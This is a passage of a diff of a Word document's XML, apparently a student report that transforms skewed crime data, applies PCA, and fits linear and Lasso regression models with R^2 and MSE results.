-        <w:t xml:space="preserve"> that one column still exhibits skewness. In </w:t>
-      </w:r>
-      <w:r>
-        <w:t>other hand</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, using exponential </w:t>
-      </w:r>
-      <w:r>
-        <w:t>or</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Box-Cox transformations</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, both were </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">effective approaches for mitigating and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>completely eliminating</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> skewness in the data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Considering that using Exponential transformation, will change the column to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> infinite number, the best approach is using the Box-Cox transformation to handle left skew.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Result of applying exponential transformation:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52789E67" wp14:editId="6F40C8B9">
-            <wp:extent cx="4637975" cy="1360544"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31086ED7" wp14:editId="5D6FDF91">
+            <wp:extent cx="2801880" cy="1491933"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1531287169" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+            <wp:docPr id="237072364" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -13204,30 +12869,23 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1531287169" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="237072364" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
-                  <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId35"/>
-                    <a:srcRect l="-366" t="1471" r="-1"/>
-                    <a:stretch/>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4664637" cy="1368365"/>
+                      <a:ext cx="2811174" cy="1496882"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                    <a:extLst>
-                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
-                      </a:ext>
-                    </a:extLst>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -13238,32 +12896,55 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Result of applying </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Box-Cox</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> transformation:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Cubes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Transformation:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Exponential transformations can be applied to data with negative skewness to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>expands small values and compresses large values</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>which will make the distribution more symmetric</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00773C84" wp14:editId="6FC720DE">
-            <wp:extent cx="4567517" cy="1404187"/>
-            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
-            <wp:docPr id="795827162" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41012D57" wp14:editId="0B465F4B">
+            <wp:extent cx="2345961" cy="1371600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="132951381" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -13271,7 +12952,73 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="795827162" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="132951381" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2350210" cy="1374085"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Applying square or cube transformation was effective at reducing skewness, but it was not enough to fully adjust the highly skewed column</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. The best option is to apply both transformations</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F3292D7" wp14:editId="57D02F37">
+            <wp:extent cx="6120130" cy="2794635"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="907770745" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="907770745" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -13283,7 +13030,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4577150" cy="1407148"/>
+                      <a:ext cx="6120130" cy="2794635"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -13299,10 +13046,13 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Now we have our data cleaned and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>more symmetric, we can apply some predictions and Machine learning models.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13314,29 +13064,18 @@
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Now we have our data cleaned and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>more symmetric</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, we can apply some predictions and Machine learning models.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Principal Component Analysis (PCA)</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Forecasting</w:t>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13344,15 +13083,199 @@
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">For forecasting the quantity of crimes and the crime rate, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Its</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
+        <w:t xml:space="preserve">As we have a dataset with </w:t>
+      </w:r>
+      <w:r>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> columns, it is </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a good approach to reduce </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the dimension</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">,  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">or this </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">purpose, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Principal component analysis (PCA) </w:t>
+      </w:r>
+      <w:r>
+        <w:t>technique</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> will be </w:t>
+      </w:r>
+      <w:r>
+        <w:t>applied</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>PCA simplifies the complexity of the dataset while preserving its essential structure.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>pply PCA with 10 n_components to evaluate wich will be the best components number</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7134C2AF" wp14:editId="1F60B6B9">
+            <wp:extent cx="5181600" cy="2265001"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="965089130" name="Picture 1" descr="A graph with a red line&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="965089130" name="Picture 1" descr="A graph with a red line&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId37"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5189126" cy="2268291"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+        <w:t>Figure 9 – Cumulative Explained Variance</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Based on this chart, we can assume that the best number of </w:t>
+      </w:r>
+      <w:r>
+        <w:t>components</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is 5, because from 1 to 5 they explain over 90% of the variance in the data. After 5 components, the variance explained by each additional component drops off sharply, indicating that these components are not capturing much important information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-US"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-US"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Predicting Crime Rate  after applying PCA.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">For </w:t>
+      </w:r>
+      <w:r>
+        <w:t>predicting</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the crime rate, Its necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13371,26 +13294,437 @@
         <w:t>Linear regression:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Linear regression is a simple but powerful model that can be used to predict continuous variables, such as population growth. It works by finding a linear relationship between the population growth and one or more independent variables, such as fertility rates, mortality rates, and migration rates.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-IE"/>
-        </w:rPr>
+        <w:t xml:space="preserve"> Linear regression is a powerful model that can be used to predict continuous variables, such as population growth</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or crime rate, that is because </w:t>
+      </w:r>
+      <w:r>
+        <w:t>it is</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> used to model the relationship between a dependent variable and one or more independent variable</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">For this purpose it’s the best option because the variables and the target are </w:t>
+      </w:r>
+      <w:r>
+        <w:t>known</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>After creating the linear regression model and applying, the residual plot can provide the accuracy of the model.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7585E1A5" wp14:editId="017B5D8F">
+            <wp:extent cx="2776538" cy="2194901"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
+            <wp:docPr id="1556042066" name="Picture 1" descr="A graph with blue dots and green lines&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1556042066" name="Picture 1" descr="A graph with blue dots and green lines&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2788551" cy="2204397"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Figure 11 – Residual Plo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The residual plot shows that the residuals for your linear regression model are randomly scattered around the zero line. This indicates that your model is a good fit for the data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15ADEE3B" wp14:editId="262F4C52">
+            <wp:extent cx="6120130" cy="1231265"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="2031203220" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2031203220" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6120130" cy="1231265"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>R-squared score (R^2)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is a measure of how well the model explains the variation in the data. A higher R^2 score indicates a better fit. The R^2 score on the training set is 1.000 and the R^2 score on the test set is 0.997.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Mean squared error (MSE)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The mean squared error (MSE) is a measure of how close the predicted values are to the actual values. It is calculated by taking the average of the squared differences between the predicted values and the actual values</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Based on the MSE and </w:t>
+      </w:r>
+      <w:r>
+        <w:t>R^2</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
+      <w:r>
+        <w:t xml:space="preserve"> results, we can assume that the model is performing well, and can be applied in a new dataset.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lasso Regression:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Appling Lasso Regression, we had also a good result, which means that this model can be applied in a new dataset:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328CA477" wp14:editId="5475E0FD">
+            <wp:extent cx="2841812" cy="882501"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="662763721" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="662763721" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2850563" cy="885218"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26B8252D" wp14:editId="09D2CAEC">
+            <wp:extent cx="3088341" cy="2299753"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="172839355" name="Picture 1" descr="A graph with a red line&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="172839355" name="Picture 1" descr="A graph with a red line&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3100006" cy="2308440"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
